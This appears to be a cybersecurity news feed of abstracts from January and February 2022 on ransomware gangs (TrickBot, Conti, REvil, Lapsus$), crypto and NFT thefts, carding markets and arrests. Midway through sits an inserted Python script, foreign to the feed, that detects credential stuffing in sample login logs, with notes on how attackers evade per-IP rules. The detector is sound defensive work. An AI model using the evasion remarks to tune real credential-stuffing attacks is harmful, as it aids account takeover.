Abstract Even as the TrickBot infrastructure closed shop, the operators of the malware are continuing to refine and retool their arsenal to carry out attacks that culminated in the deployment of Conti ransomware. IBM Security X-Force, which discovered the revamped version of the criminal gang's AnchorDNS backdoor, dubbed the new, upgraded variant AnchorMail. AnchorMail "uses an email-based [command-and-control] server which it communicates with using SMTP and IMAP protocols over TLS," IBM's malware reverse engineer, Charlotte Hammond, said. "With the exception of the overhauled C2 communication mechanism, AnchorMail's behavior aligns very closely to that of its AnchorDNS predecessor." The cybercrime actor behind TrickBot, ITG23 aka Wizard Spider, is also known for its development of the Anchor malware framework, a backdoor reserved for targeting selected high value victims since at least 2018 via TrickBot and BazarBackdoor (aka BazarLoader), an additiona

The Hacker News


February 28, 2022

Researcher leaked Conti’s internal chat messages in response to its support to Russia Full Text

Abstract A Ukrainian researcher leaked tens of thousands of internal chat messages belonging to the Conti ransomware operation. The researcher leaked 60,694 internal chat messages belonging to the Conti ransomware operation after the announcement...

Security Affairs


February 28, 2022

Hackers to NVIDIA: Remove mining cap or we leak hardware data Full Text

Abstract The Lapsus$ data extortion group has released what they claim to be data stolen from the Nvidia GPU designer. The cache is an archive that is almost 20GB large.

BleepingComputer


February 25, 2022

TrickBot malware operation shuts down, devs move to BazarBackdoor Full Text

Abstract The TrickBot malware operation has shut down after its core developers moved to the Conti ransomware gang to focus development on the stealthy BazarBackdoor and Anchor malware families.

BleepingComputer


February 25, 2022

TrickBot Takes a Break, Leaving Researchers Scratching Their Heads Full Text

Abstract The infamous trojan is likely making some major operational changes, researchers believe.

Threatpost


February 25, 2022

Ransomware gangs, hackers pick sides over Russia invading Ukraine Full Text

Abstract Hacker crews are picking sides as the Russian invasion into Ukraine continues, issuing bans and threats for supporters of the opposite side.

BleepingComputer


February 24, 2022

TrickBot Gang Likely Shifting Operations to Switch to New Malware Full Text

Abstract TrickBot, the infamous Windows crimeware-as-a-service (CaaS) solution that's used by a variety of threat actors to deliver next-stage payloads like ransomware, appears to be undergoing a transition of sorts, with no new activity recorded since the start of the year. The lull in the malware campaigns is "partially due to a big shift from Trickbot's operators, including working with the operators of Emotet," researchers from Intel 471 said in a report shared with The Hacker News. The last set of attacks involving TrickBot were registered on December 28, 2021, even as command-and-control (C2) infrastructure associated with the malware has continued to serve additional plugins and web injects to infected nodes in the botnet. Interestingly, the decrease in the volume of the campaigns has also been accompanied by the TrickBot gang working closely with the operators of Emotet, which witnessed a resurgence late last year after a 10-month-long break following law en

The Hacker News


February 23, 2022

Network hackers focus on selling high-value targets in the U.S. Full Text

Abstract A Crowdstrike report looking into access brokers' advertisements since 2019 has identified a preference in academic, government, and technology entities based in the United States.

BleepingComputer


February 22, 2022

Police bust phishing group that used 40 sites to steal credit cards Full Text

Abstract The Ukrainian cyberpolice have arrested a group of phishing actors who managed to steal payment card data from at least 70,000 people after luring them to fake mobile service top up sites.

BleepingComputer


February 22, 2022

Hackers Stole $1.7 Million Worth of NFTs from Users of OpenSea Marketplace Full Text

Abstract Malicious actors took advantage of a smart contract upgrade process in the OpenSea NFT marketplace to carry out a phishing attack against 17 of its users that resulted in the theft of virtual assets worth about $1.7 million. NFTs, short for non-fungible tokens, are digital tokens that act like certificates of authenticity for, and in some cases represent ownership of, assets that range from expensive illustrations to collectibles and physical goods. The opportunistic social engineering scam swindled the users by using the same email from OpenSea notifying users about the upgrade, with the copycat email redirecting the victims to a lookalike webpage, prompting them to sign a seemingly legitimate transaction, only to steal all the NFTs in one go. "By signing the transaction, an atomicMatch_ request would be sent to the attacker contract," Check Point researchers explained. "From there, the atomicMatch_ would be forwarded to the OpenSea contract," leading t

The Hacker News


February 22, 2022

Police dismantled a gang that used phishing sites to steal credit cards Full Text

Abstract The Ukrainian police arrested a gang specializing in the sale of payment card data stolen through phishing attacks. The cybercrime unit of the Ukrainian police has arrested a group of cybercriminals who managed to steal payment card data from at least...

Security Affairs


February 20, 2022

Threat actors stole at least $1.7M worth of NFTs from tens of OpenSea users Full Text

Abstract Threat actors have stolen and flipped high-value NFTs from the users of the world's largest NFT exchange, OpenSea. OpenSea on Sunday confirmed that some of its users had been hit by a phishing attack and had lost...

Security Affairs


February 18, 2022

Conti ransomware gang takes over TrickBot malware operation Full Text

Abstract After four years of activity and numerous takedown attempts, the death knell of TrickBot has sounded as its top members move under new management, the Conti ransomware syndicate, who plan to replace it with the stealthier BazarBackdoor malware.

BleepingComputer


February 15, 2022

BlackCat (ALPHV) claims Swissport ransomware attack, leaks data Full Text

Abstract The BlackCat ransomware group, aka ALPHV, has claimed responsibility for the recent cyber attack on cargo and hospitality services giant Swissport that caused flight delays and service disruptions.

BleepingComputer


February 14, 2022

Spanish Police Arrest SIM Swappers Who Stole Money from Victims Bank Accounts Full Text

Abstract Spain's National Police Agency, the Policía Nacional, said last week it dismantled an unnamed cybercriminal organization and arrested eight individuals in connection with a series of SIM swapping attacks that were carried out with the goal of financial fraud. The suspects of the crime ring masqueraded as trustworthy representatives of banks and other organizations and used traditional phishing and smishing techniques to obtain personal information and bank data of victims before draining money from their accounts. "They usurped the identity of their victims through the falsification of official documents and tricked employees of telephone stores into getting the duplicate of SIM cards, cards where they received security confirmation messages from banks that allowed them to empty their victims' accounts," the authorities said. Seven of the arrests were made in Barcelona and one in Seville. As many as 12 bank accounts were frozen as part of the illicit operation.

The Hacker News


February 14, 2022

Ransomware Becomes Deadlier, Conti Makes the Most Money Full Text

Abstract Ransomware actors are constantly upgrading their TTPs and finding new ways to make profits. A new report by Chainalysis states that ransomware victims spent almost $700 million in ransom in 2020.

Cyware Alerts - Hacker News


February 11, 2022

Spanish police dismantled SIM swapping gang who stole money from victims’ bank accounts Full Text

Abstract Spanish National Police arrested eight alleged members of a crime ring specializing in SIM swapping attacks. The eight suspects were allegedly part of a crime organization that stole money from the bank accounts of its victims...

Security Affairs


February 10, 2022

Spain dismantles SIM swapping group who emptied bank accounts Full Text

Abstract Spanish National Police has arrested eight suspects allegedly part of a crime ring who drained bank accounts in a series of SIM swapping attacks.

BleepingComputer


February 9, 2022

Ex-Gumshoe Nabs Cybercrooks with FBI Tactics Full Text

Abstract Crane Hassold, former FBI analyst turned director of threat intel at Abnormal Security, shares stories from his covert work tracking cyberattackers.

Threatpost


February 09, 2022

Russia Cracks Down on 4 Dark Web Marketplaces for Stolen Credit Cards Full Text

Abstract A special law enforcement operation undertaken by Russia has led to the seizure and shutdown of four online bazaars that specialized in the theft and sale of stolen credit cards, as the government continues to take active measures against harboring cybercriminals on its territory. To that end, the domains operated by the card fraud forums and marketplaces Ferum Shop, Sky-Fraud, Trump's Dumps, and UAS were confiscated and plastered with a banner that warned "theft of funds from bank cards is illegal." Also embedded into the HTML source code was a message asking, "Which one of you is next?" The seizures were orchestrated by the Department "K," a division of the Ministry of Internal Affairs of the Russian Federation that focuses primarily on information technology-related crimes, according to Flashpoint. In a related development, state-owned news agency TASS said that six Russian individuals were being charged with "the illegal circulation o

The Hacker News


February 09, 2022

U.S. Arrests Two and Seizes $3.6 Billion Cryptocurrency Stolen in 2016 Bitfinex Hack Full Text

Abstract The U.S. Justice Department (DoJ) on Tuesday announced the arrest of a married couple in connection with conspiring to launder cryptocurrency worth $4.5 billion that was siphoned during the hack of the virtual currency exchange Bitfinex in 2016. Ilya Lichtenstein, 34, and his wife, Heather Morgan, 31, both of New York, are alleged to have "stolen funds through a labyrinth of cryptocurrency transactions," with the law enforcement getting hold of over $3.6 billion in cryptocurrency by following the money trails, resulting in the "largest financial seizure ever." "Bitfinex will work with the DoJ and follow appropriate legal processes to establish our rights to a return of the stolen bitcoin," the company said in a statement, adding "We have been cooperating extensively with the DoJ since its investigation began and will continue to do so." The laundering scheme involved moving proceeds of 119,754 bitcoin (BTC) from Bitfinex by initiating

The Hacker News


February 08, 2022

US seizes $3.6 billion stolen in 2016 Bitfinex cryptoexchange hack Full Text

Abstract The US Department of Justice announced that law enforcement seized billions worth of cryptocurrency linked to the 2016 Bitfinex cryptocurrency exchange hack.

BleepingComputer


February 8, 2022

Russian police arrested six people involved in the theft and selling of stolen credit cards Full Text

Abstract Russian police arrested six individuals, allegedly members of a crime ring involved in the theft and sale of stolen credit cards.

Security Affairs


February 07, 2022

Russia arrests third hacking group, reportedly seizes carding forums Full Text

Abstract Russia arrested six people today, allegedly part of a hacking group that was involved in the theft and selling of stolen credit cards.

BleepingComputer


February 7, 2022

Cybercriminals Using SEO Poisoning To Spread Malware Full Text

Abstract A new SEO poisoning campaign drops Batloader and Atera Agent malware, targeting users attempting to download productivity tools such as Zoom, Visual Studio, and TeamViewer. The researchers claim that some techniques used in the campaigns match those in the Conti playbooks. It is suggested to c ...

Cyware Alerts - Hacker News


February 07, 2022

Russia arrests third hacking group, seizes carding forums Full Text

Abstract Russia arrested six people today, allegedly part of a hacking group that was involved in the theft and selling of stolen credit cards.

BleepingComputer


February 7, 2022

Ransomware groups and APT actors laser-focused on financial services Full Text

Abstract Despite a community reckoning to ban ransomware activity from online forums, hacker groups used alternate personas to proliferate the use of ransomware against an increasing spectrum of sectors.

Help Net Security


February 06, 2022

Law enforcement action pushes ransomware gangs to surgical attacks Full Text

Abstract The numerous law enforcement operations leading to the arrests and takedown of ransomware operations in 2021 have forced threat actors to narrow their targeting scope and maximize the efficiency of their operations.

BleepingComputer


February 5, 2022

LockBit ransomware gang claims to have stolen data from PayBito crypto exchange Full Text

Abstract LockBit ransomware gang claims to have stolen customers' data from the PayBito crypto exchange. PayBito is a bitcoin and cryptocurrency exchange for major cryptocurrencies including Bitcoin Cash, Bitcoin, Ethereum, HCX, Litecoin, Ethereum Classic....

Security Affairs


February 4, 2022

Distrust, feuds building among ransomware groups Full Text

Abstract In an industry that operates in anonymity, trust is everything -- but recent accusations of ransomware actors working with or being law enforcement is threatening that work model.

Tech Target


February 3, 2022

Cybercriminals Bypass MFA, Stealing Browser Sessions Using MiTM Phishing Kits Full Text

Abstract Threat actors are using phish kits that leverage transparent reverse proxy, which enables them to man-in-the-middle (MitM) a browser session and steal credentials and session cookies in real-time.

Proof Point


February 2, 2022

Is REvil Active Even After Arrests? Full Text

Abstract Even after the recent arrest of members of the REvil ransomware group, researchers have found multiple samples being deployed across targets. After the arrests, the number of REvil implants dipped to 24 per day, but that again increased to 26 implants a day. Today, it is highly obscure wh ...

Cyware Alerts - Hacker News


January 31, 2022

Hackers stole $80M worth of cryptocurrency from the Qubit DeFi platform Full Text

Abstract Threat actors stole $80M worth of cryptocurrency from the Qubit DeFi platform by exploiting a flaw in the smart contract code used in an Ethereum bridge. The DeFi platform Qubit Finance was the victim of a cyber heist in which threat actors stole around $80 million...

Security Affairs


January 30, 2022

DeepDotWeb News Site Operator Sentenced to 8 Years for Money Laundering Full Text

Abstract An Israeli national was sentenced to 97 months in prison in connection with operating the DeepDotWeb (DDW) clearnet website, nearly a year after the individual pleaded guilty to the charges. Tal Prihar, 37, an Israeli citizen residing in Brazil, is said to have played the role of an administrator of DDW since the website became functional in October 2013. He pleaded guilty to money laundering charges in March 2021 and agreed to forfeit the illegally amassed profits. DDW, until its seizure in May 2019, ostensibly served as a "news" website that connected internet users with underground marketplaces on the dark web that operate via darknets such as Tor, enabling the purchase of illegal firearms, malware and hacking tools, stolen financial data, heroin, fentanyl, and other illicit materials. Prihar, acting in concert with co-defendant Michael Phan, 34, of Israel, provided direct links to illegal marketplaces and in return for advertising these links, reaped substantia

The Hacker News


January 29, 2022

Jupyter: A Cyberspace Invader Stealing SLTT Data Full Text

Abstract Jupyter deploys a multi-stage process, leveraging PowerShell and legitimate tools, such as Slim PDF Reader, to drop secondary payloads to fingerprint victim information, including computer name, OS version, architecture, and user identifier.

CIS


January 28, 2022

Microsoft Outlook RCE zero-day exploits now selling for $400,000 Full Text

Abstract Exploit broker Zerodium has announced a payout jump to $400,000 for zero-day vulnerabilities that allow remote code execution (RCE) in the Microsoft Outlook email client.

BleepingComputer


January 27, 2022

REvil Ransomware Operations Apparently Unaffected by Recent Arrests Full Text

Abstract The REvil ransomware cooperative’s activity has not slowed down following Russia’s recent move to arrest several alleged members of the group, according to threat intelligence company ReversingLabs.

Security Week


January 27, 2022

Lockbit ransomware gang claims to have hacked Ministry of Justice of France Full Text

Abstract A few hours ago, Lockbit ransomware operators announced that they had stolen data from the Ministry of Justice of France. The Ministry of Justice of France is a body of the French government, which is responsible for: supervision of the judiciary, its maintenance...

Security Affairs


January 26, 2022

Telegram Becomes Viable Alternative to the Dark Web, Here’s How Attackers are Exploiting It Full Text

Abstract In a report from Cybersixgill, researchers revealed that compromised cards from most popular financial institutions are a lucrative commodity on Telegram-based illicit marketplaces.

Cyware Alerts - Hacker News


January 25, 2022

High anxiety spreads among Russian criminal groups in wake of REvil raid Full Text

Abstract The crackdown on members of the REvil gang by agents of Russian security forces this month is sending a wave of distress and dread through the Russian hacker underground, according to Trustwave.

CSO Online


January 25, 2022

Russia arrests leader of “Infraud Organization” hacker group Full Text

Abstract The Russian Federal Security Service (FSB) and law enforcement have arrested Andrey Sergeevich Novak, the alleged leader of the Infraud Organization, a hacker group that caused losses of more than $560 million in seven years of activity.

BleepingComputer


January 24, 2022

Russian authorities arrested the kingpin of cybercrime Infraud Organization Full Text

Abstract Russian authorities arrested four alleged members of the international cyber theft ring tracked as 'Infraud Organization.' In February 2008, the US authorities dismantled the global cybercrime organization tracked as Infraud Organization, which was involved...

Security Affairs


January 24, 2022

Ransomware gangs increase efforts to enlist insiders for attacks Full Text

Abstract A recent survey of 100 large (over 5,000 employees) North American IT firms shows that ransomware actors are making greater effort to recruit insiders in targeted firms to aid in attacks.

BleepingComputer


January 21, 2022

North Korean Hackers Stole Crypto Worth $400 Million in 2021 Full Text

Abstract A new report suggests that North Korean hackers mooched off at least $400 million in cryptocurrencies through cyberattacks in 2021, a whopping 40% increase compared to the previous year. Hackers use a systematic money laundering process that involves multiple software tools to collect ...

Cyware Alerts - Hacker News


January 21, 2022

Conti ransomware gang started leaking files stolen from Bank Indonesia Full Text

Abstract The central bank of the Republic of Indonesia, Bank Indonesia, confirmed the ransomware attack that hit it in December. Bank Indonesia confirmed that it was the victim of a ransomware attack that took place last month. The Conti ransomware gang claimed...

Security Affairs


January 20, 2022

FBI links the Diavol ransomware to the TrickBot gang Full Text

Abstract The Federal Bureau of Investigation (FBI) officially linked the Diavol ransomware operation to the infamous TrickBot gang, the group that is behind the TrickBot...

Security Affairs


January 20, 2022

Interpol Busted 11 Members of Nigerian BEC Cybercrime Gang Full Text

Abstract A coordinated law enforcement operation has resulted in the arrest of 11 members allegedly belonging to a Nigerian cybercrime gang notorious for perpetrating business email compromise (BEC) attacks targeting more than 50,000 victims in recent years. The disruption of the BEC network is the result of a ten-day investigation dubbed Operation Falcon II undertaken by the Interpol along with participation from the Nigeria Police Force's Cybercrime Police Unit in December 2021. Cybersecurity firms Group-IB and Palo Alto Networks' Unit 42, both of which shared information on the threat actors and their infrastructure, said six of the 11 suspects are believed to be a part of a prolific group of Nigerian cyber actors known as SilverTerrier (aka TMT). BEC attacks, which began to gain dominance in 2013, are sophisticated scams that target legitimate business email accounts through social engineering schemes to infiltrate corporate networks and subsequently leverage their acce

The Hacker News


January 19, 2022

A Trip to the Dark Site — Leak Sites Analyzed Full Text

Abstract Gone are the days when ransomware operators were happy with encrypting files on-site and more or less discreetly charged their victims money for a decryption key. What we commonly find now is encryption with the additional threat of leaking stolen data, generally called Double-Extortion (or, as we like to call it: Cyber Extortion or Cy-X). This is a unique form of cybercrime in that we can observe and analyze some of the criminal action via 'victim shaming' leak sites. Since January 2020, we have applied ourselves to identifying as many of these sites as possible to record and document the victims who feature on them. Adding our own research, analyzing, and enriching data scraped from the various Cy-X operators and market sites, we can provide direct insights into the victimology from this specific perspective. We must be clear that what we are analyzing is a limited perspective on the crime. Nevertheless, the data gleaned from an analysis of the leak-threats proves to be ex

The Hacker News


January 19, 2022

Cybercriminals Using QR Codes to Steal Money and Credentials from Victims Full Text

Abstract The FBI's Internet Crime Complaint Center (IC3) issued a general alert Tuesday about "malicious" QR codes that reroute unsuspecting consumers to the world of cybercrime.

Cyberscoop


January 19, 2022

Nigerian police, Interpol arrest members of SilverTerrier BEC gang Full Text

Abstract Interpol said that, based on a forensic analysis of the data extracted from phones and computers seized during house searches, the 11 suspects were linked to attacks on more than 50,000 targets.

The Record


January 19, 2022

Interpol arrests 11 BEC gang members linked to 50,000 targets Full Text

Abstract Interpol, in coordination with the Nigerian Police Force, has arrested eleven individuals suspected of participating in an international BEC (business email compromise) ring.

BleepingComputer


January 18, 2022

Telegram is a hotspot for the sale of stolen financial accounts Full Text

Abstract Telegram is increasingly abused by cybercriminals to set up underground channels to sell stolen financial details to pseudonymous users.

BleepingComputer


January 18, 2022

AlphV/BlackCat ransomware gang published data stolen from fashion giant Moncler Full Text

Abstract Luxury fashion giant Moncler confirmed a data breach following a ransomware attack by the AlphV/BlackCat gang. The attack took place in December, and the stolen data has since been published on the gang's leak site...

Security Affairs


January 18, 2022

Europol Shuts Down VPNLab, Cybercriminals’ Favourite VPN Service Full Text

Abstract VPNLab.net, a VPN provider that was used by malicious actors to deploy ransomware and facilitate other cybercrimes, was taken offline following a coordinated law enforcement operation. Europol said it took action against the misuse of the VPN service by taking down 15 of its servers on January 17 and rendering it inoperable as part of a disruptive action that took place across Germany, the Netherlands, Canada, the Czech Republic, France, Hungary, Latvia, Ukraine, the U.S., and the U.K. A second outcome of the seizure is that at least 100 businesses that have been identified as at risk of impending cyber attacks are being notified. Europol didn't disclose the names of the companies. Established in 2008, the service provided an advanced level of anonymity by offering double VPN connections to its clients, wherein the internet traffic is routed through two VPN servers located in different countries instead of one, for as cheap as $60 a year. "This made VPNLab.net a popular

The Hacker News


January 18, 2022

Cybercriminals Actively Target VMware vSphere with Cryptominers Full Text

Abstract VMware’s container-based application development environment has become attractive to cyberattackers.

Threatpost


January 17, 2022

Mespinoza/Pysa Ransomware Keeps Targeting Healthcare Sector Full Text

Abstract According to the HHS, PYSA ransomware operators are aggressively eyeing the healthcare sector in the U.S. to pull off double extortion attacks. As of November 2021, PYSA had already targeted 190 victims, of which six were from the healthcare sector. The sector should evaluate its defense-i ...

Cyware Alerts - Hacker News


January 17, 2022

Dark Web’s Largest Marketplace for Stolen Credit Cards is Shutting Down Full Text

Abstract UniCC, the biggest dark web marketplace for stolen credit and debit cards, has announced that it's shuttering its operations after earning $358 million in purchases since 2013 using cryptocurrencies such as Bitcoin, Litecoin, Ether, and Dash. "Don't build any conspiracy theories about us leaving," the anonymous operators of UniCC said in a farewell posted on dark web carding forums, according to blockchain analytics firm Elliptic. "It is [a] weighted decision, we are not young and our health do[es] not allow [us] to work like this any longer." The UniCC team also gave its users 10 days to spend their balances, while also warning customers to "not follow any fakes tied to our comeback." Platforms such as UniCC function as an underground marketplace wherein credit card details stolen from online retailers, banks, and payments companies by injecting malicious skimmers are trafficked in exchange for cryptocurrency. The cards are then used by crim

The Hacker News


January 16, 2022

Threat actors stole $18.7M from the Lympo NFT platform Full Text

Abstract Threat actors hacked the hot wallet of the NFT platform Lympo and stole 165.2 million LMT (worth $18.7 million). NFT and DeFi platforms are privileged targets for cybercriminals, and Lympo is only the latest platform to be hit...

Security Affairs


January 15, 2022

One of the REvil members arrested by FSB was behind Colonial Pipeline attack Full Text

Abstract A senior Biden administration official said that one of the Russian hackers arrested by the FSB was behind the Colonial Pipeline attack. Yesterday, the Russian Federal Security Service (FSB) announced that it had dismantled the REvil ransomware operation...

Security Affairs


January 15, 2022

At Request of U.S., Russia Rounds Up 14 REvil Ransomware Affiliates Full Text

Abstract The Russian government has arrested 14 people accused of working for “REvil,” a particularly aggressive ransomware group that has extorted hundreds of millions of dollars from victim organizations.

Krebs on Security


January 15, 2022

Russia Arrests REvil Ransomware Gang Responsible for High-Profile Cyber Attacks Full Text

Abstract In an unprecedented move, Russia's Federal Security Service (FSB), the country's principal security agency, on Friday disclosed that it arrested several members belonging to the notorious REvil ransomware gang and neutralized its operations. The surprise operation, which it said was carried out at the request of the U.S. authorities, saw the law enforcement agency conduct raids at 25 addresses in the cities of Moscow and St. Petersburg and in the Moscow, Leningrad and Lipetsk regions that belonged to 14 suspected members of the organized cybercrime syndicate. "In order to implement the criminal plan, these persons developed malicious software, organized the theft of funds from the bank accounts of foreign citizens and their cashing, including through the purchase of expensive goods on the Internet," the FSB said in a statement. In addition, the FSB seized over 426 million rubles, including in cryptocurrency, $600,000, €500,000, as well as computer equipment, crypto wallets

The Hacker News


January 15, 2022

Lorenz ransomware gang stole files from defense contractor Hensoldt Full Text

Abstract The Lorenz ransomware cybercrime gang has been active since April 2021 and has hit multiple organizations worldwide, demanding hundreds of thousands of dollars in ransoms from its victims.

Security Affairs


January 14, 2022

Top Illicit Carding Marketplace UniCC Abruptly Shuts Down Full Text

Abstract UniCC controlled 30 percent of the stolen payment-card data market; leaving analysts eyeing what’s next.

Threatpost


January 14, 2022

Lorenz ransomware gang stole files from defense contractor Hensoldt Full Text

Abstract German multinational defense contractor Hensoldt confirmed that some of its UK subsidiary's systems were infected with Lorenz ransomware....

Security Affairs


January 14, 2022

Former DHS official charged with stealing govt employees’ PII Full Text

Abstract A former Department of Homeland Security acting inspector general pleaded guilty today to stealing confidential and proprietary software and sensitive databases from the US government containing employees' personal identifying information (PII).

BleepingComputer


January 14, 2022

Husband-Wife Arrested in Ukraine for Ransomware Attacks on Foreign Companies Full Text

Abstract Ukrainian police authorities have nabbed five members of a gang that's believed to have helped orchestrate attacks against more than 50 companies across Europe and the U.S. and caused losses to the tune of more than $1 million. The special operation, which was carried out with the assistance of law enforcement officials from the U.K. and U.S., saw the arrest of an unnamed 36-year-old individual from the capital city of Kyiv, along with his wife and three other accomplices. A total of nine searches across the suspects' homes were carried out, resulting in the seizure of computer equipment, mobile phones, bank cards, flash drives, three cars, and other items with evidence of illegal activity. The Cyber Police of the National Police of Ukraine said the group offered a "hacker service" that enabled financially motivated crime syndicates to send phishing emails containing file-encrypting malware to lock confidential data pertaining to its victims, demanding that the target

The Hacker News


January 14, 2022

Ukrainian police arrested Ransomware gang behind attacks on 50 companies Full Text

Abstract Ukrainian police arrested members of a ransomware affiliate group responsible for attacking at least 50 companies in the U.S. and Europe....

Security Affairs


January 14, 2022

FSB arrests REvil ransomware gang members Full Text

Abstract Raids were conducted by the Russian Federal Security Service (FSB) at 25 residences belonging to 14 suspected members of the REvil team across the Moscow, St. Petersburg, Leningrad, and Lipetsk regions.

The Record


January 14, 2022

Russia arrests REvil ransomware gang members, seizes $6.6 million Full Text

Abstract The Federal Security Service (FSB) of the Russian Federation has announced today that they shut down the REvil ransomware gang after U.S. authorities reported on the leader.

BleepingComputer


January 13, 2022

North Korean hackers stole almost $400M in cryptocurrency, report says Full Text

Abstract North Korean hackers in 2021 stole nearly $400 million in cryptocurrency, according to a report released on Thursday, making it one of the most prolific years to date for cybercriminals in the isolated nation.

The Hill


January 13, 2022

BlueNoroff hackers steal crypto using fake MetaMask extension Full Text

Abstract The North Korean threat actor group known as 'BlueNoroff' has been spotted targeting cryptocurrency startups with malicious documents and fake MetaMask browser extensions.

BleepingComputer


January 13, 2022

Ukrainian police arrest ransomware gang that hit over 50 firms Full Text

Abstract Ukrainian police officers have arrested a ransomware affiliate group responsible for attacking at least 50 companies in the U.S. and Europe.

BleepingComputer


January 12, 2022

Purple Fox Develops Complex Attack Chain for Persistence Full Text

Abstract Researchers uncovered cybercriminals using a malicious Telegram installer to drop the Purple Fox rootkit. It is believed to be spreading via email or phishing websites. Phase-based operations and the dependency on different files for each phase help the attacker go unnoticed by security s ...

Cyware Alerts - Hacker News


January 12, 2022

SMEs still an easy target for cybercriminals Full Text

Abstract As per a new survey, 88% of businesses had at least one form of cybersecurity control in place, with 70% feeling fairly confident or extremely confident in their cybersecurity arrangements.

Help Net Security


January 7, 2022

AvosLocker Actors Seek Apology by Releasing Free Decryptor Full Text

Abstract The AvosLocker ransomware group has coughed up a free decryptor after learning that one of its victims was a U.S. police department. The operators said that taxpayer money is generally hard to get, so they usually avoid targeting government entities. Earlier this week, it was spotted with ...

Cyware Alerts - Hacker News


January 6, 2022

Threat actors stole 1.1 million customer accounts from 17 well-known companies Full Text

Abstract The New York State Office of the Attorney General (NY OAG) has warned 17 companies that roughly 1.1 million of their customers have had their user accounts compromised in credential stuffing attacks...

Security Affairs


January 5, 2022

‘Elephant Beetle’ Lurks for Months in Networks Full Text

Abstract The group blends into an environment before loading up trivial, thickly stacked, fraudulent financial transactions too tiny to be noticed but adding up to millions of dollars.

Threatpost


January 05, 2022

Broker-dealers impersonators stole $50 million using spoofed sites Full Text

Abstract A California man admitted his role in a large-scale and long-running Internet-based fraud scheme that allowed him and other fraudsters to siphon roughly $50 million from dozens of investors over eight years, between 2012 and October 2020.

BleepingComputer


January 05, 2022

70 investors lose $50 million to fraudsters posing as broker-dealers Full Text

Abstract A California man admitted his role in a large-scale and long-running Internet-based fraud scheme that allowed him and other fraudsters to siphon roughly $50 million from dozens of investors over eight years, between 2012 and October 2020.

BleepingComputer


January 05, 2022

NY OAG: Hackers stole 1.1 million customer accounts from 17 companies Full Text

Abstract The New York State Office of the Attorney General (NY OAG) has warned 17 well-known companies that roughly 1.1 million of their customers have had their user accounts compromised in credential stuffing attacks.

BleepingComputer
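The NY OAG notice above describes the outcome of credential stuffing (leaked username/password pairs replayed against many accounts) but not how a defender spots it in their own authentication logs. The following is an added example, not code from the NY OAG, BleepingComputer, or any of the named companies: it aggregates constructed, hypothetical login events by source IP and flags the signature that distinguishes stuffing from ordinary failed logins or single-account brute force, namely many distinct usernames from one source with a high failure ratio, then lists the accounts that did succeed from a flagged source, since those are the ones that need a forced reset and notification. The log format, field names, and thresholds are assumptions for the example.

```python
import re
from collections import defaultdict
from dataclasses import dataclass, field

# Constructed sample auth log (hypothetical format; not from any real system).
# 203.0.113.7 tries ten different accounts once each and gets two in: stuffing.
# 198.51.100.2 is one user failing twice, then succeeding: not stuffing.
SAMPLE_LOG = """\
2022-01-05T10:00:01Z ip=203.0.113.7 user=alice@example.com result=FAIL
2022-01-05T10:00:01Z ip=203.0.113.7 user=bob@example.com result=FAIL
2022-01-05T10:00:02Z ip=203.0.113.7 user=carol@example.com result=OK
2022-01-05T10:00:02Z ip=203.0.113.7 user=dave@example.com result=FAIL
2022-01-05T10:00:03Z ip=203.0.113.7 user=erin@example.com result=FAIL
2022-01-05T10:00:03Z ip=203.0.113.7 user=frank@example.com result=FAIL
2022-01-05T10:00:04Z ip=203.0.113.7 user=grace@example.com result=OK
2022-01-05T10:00:04Z ip=203.0.113.7 user=heidi@example.com result=FAIL
2022-01-05T10:00:05Z ip=203.0.113.7 user=ivan@example.com result=FAIL
2022-01-05T10:00:05Z ip=203.0.113.7 user=judy@example.com result=FAIL
2022-01-05T10:01:00Z ip=198.51.100.2 user=alice@example.com result=FAIL
2022-01-05T10:01:05Z ip=198.51.100.2 user=alice@example.com result=FAIL
2022-01-05T10:01:09Z ip=198.51.100.2 user=alice@example.com result=OK
2022-01-05T10:02:00Z ip=192.0.2.9 user=mallory@example.com result=OK
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) ip=(?P<ip>\S+) user=(?P<user>\S+) result=(?P<result>OK|FAIL)$"
)


@dataclass
class SourceStats:
    """Per-source-IP counters over the analysed window."""
    attempts: int = 0
    failures: int = 0
    users: set = field(default_factory=set)            # every username tried
    succeeded_users: set = field(default_factory=set)  # usernames that logged in

    @property
    def fail_ratio(self) -> float:
        return self.failures / self.attempts if self.attempts else 0.0


def parse_line(line: str):
    """Return (ip, user, ok) for a well-formed line, or None for anything else."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return m["ip"], m["user"], m["result"] == "OK"


def aggregate(log_text: str) -> dict:
    """Fold log lines into SourceStats keyed by source IP; skips malformed lines."""
    stats = defaultdict(SourceStats)
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if parsed is None:
            continue
        ip, user, ok = parsed
        s = stats[ip]
        s.attempts += 1
        s.users.add(user)
        if ok:
            s.succeeded_users.add(user)
        else:
            s.failures += 1
    return dict(stats)


def detect_stuffing(stats: dict, min_distinct_users: int = 5,
                    min_fail_ratio: float = 0.5) -> dict:
    """Flag sources that tried many distinct accounts and mostly failed.

    Returns {ip: set_of_accounts_that_succeeded_from_that_ip}. Those accounts
    are the likely compromised ones: the attacker held a valid reused password.
    A single user failing repeatedly (198.51.100.2 above) is deliberately not
    flagged here; that pattern is brute force or a forgotten password, which
    wants a per-account lockout rather than this per-source rule.
    """
    flagged = {}
    for ip, s in stats.items():
        if len(s.users) >= min_distinct_users and s.fail_ratio >= min_fail_ratio:
            flagged[ip] = set(s.succeeded_users)
    return flagged


if __name__ == "__main__":
    for ip, accounts in detect_stuffing(aggregate(SAMPLE_LOG)).items():
        print(f"{ip}: credential stuffing suspected; reset {sorted(accounts)}")
```

The per-source rule is the cheapest signal, and it is also the one real campaigns evade first by spreading attempts across residential proxies so that each IP makes only a handful of tries. In practice the same aggregation is run over other keys (user-agent, ASN, TLS fingerprint, or simply the global rate of distinct usernames failing per minute), and a success from a flagged source is treated as a compromised account regardless of whether the user later logs in normally.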


January 05, 2022

‘Elephant Beetle’ spends months in victim networks to divert transactions Full Text

Abstract A financially-motivated actor dubbed 'Elephant Beetle' is stealing millions of dollars from organizations worldwide using an arsenal of over 80 unique tools and scripts.

BleepingComputer


January 3, 2022

Lapsus$ Ransomware Gang Targets Impresa Media Group, Owner of SIC and Expresso Full Text

Abstract The Lapsus$ ransomware gang is extorting Impresa, the largest media conglomerate in Portugal and the owner of SIC and Expresso, the country’s largest TV channel and weekly newspaper, respectively.

The Record


January 2, 2022

Lapsus$ ransomware gang hits Impresa, Portugal’s largest media conglomerate Full Text

